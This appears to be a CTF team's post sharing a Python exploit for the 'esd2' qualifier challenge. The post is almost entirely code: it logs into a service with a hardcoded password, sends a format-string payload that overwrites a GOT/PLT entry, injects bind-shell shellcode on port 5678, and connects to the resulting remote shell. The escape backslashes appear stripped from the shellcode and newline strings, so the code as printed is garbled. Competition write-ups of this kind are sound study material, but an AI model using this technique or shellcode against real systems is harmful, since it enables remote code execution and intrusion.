CLGT did not solved this during the quals! Here is the exploit for  the **esd2 **leaked from pp200 (thanks beist for sharing). More analysis & write up for the real pp500 will come later:

#!/usr/bin/env python

import socket
import struct
import telnetlib
import time

HOST = '192.168.56.101'
PORT = 8302

def xor_input(data):
    static = "%5d | %5dn" + "x00"*4
    out = ""
    for i in range(len(data)):
        out += chr(ord(static[i]) ^ ord(data[i]))
    return out

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# send password
s.send("sp3wn0w" + "n")

# prepare the payload
# overwrite lseek@plt, original value = 0x08048ae2
target = 0x804a30c
# shellcode address = 0x0804a040 + 142 bytes (padding + fmt_string)
ret = 0x0804a0ce
# value to write into target
write_byte = 0xa0ce
# payload = target + padding(128 - 4) + 14 (fmt_string) + shellcode
padding = "A"*128
fmt_string = "%" + str(write_byte) + "u%24$hn"
fmt_string = xor_input(fmt_string)

# bindshell: port 5678
shellcode = "x00x29xc9x83xe9xecxd9xeexd9x74x24xf4x5bx81x73x13x63x7dxa9x09x83xebxfcxe2xf4x09x1cxf1x90x31x15xb9x0bx75x53x20xe8x31x3fxfbx4bx31x17xb9xc4xe3xe4x3ax58x30x2fxc3x61x3bxb0x29xb9x09xb0x29x5bx30x2fx19x17xaexfdx3ex63x61x24xc3x53x3bx2cxfex58xaexfdxe0x70x96x2dxc1x26x4cx0exc1x61x4cx1fxc0x67xeax9exf9x5dx30x2ex19x32xaexfdxa9x09"

payload = struct.pack("<L", target) + padding[4:] + fmt_string + shellcode + "n"

print "Sending payload...", repr(payload)
s.send("cn" + str(len(payload)) +"n")
s.send(payload)
# trigger the read_blob that calls lseek()
s.send("rn" + "10n")

print "Connecting to remote shell port 5678..."
time.sleep(4)
t = telnetlib.Telnet(HOST, 5678)
t.write("idnn")
t.interact()

t.close()
s.close()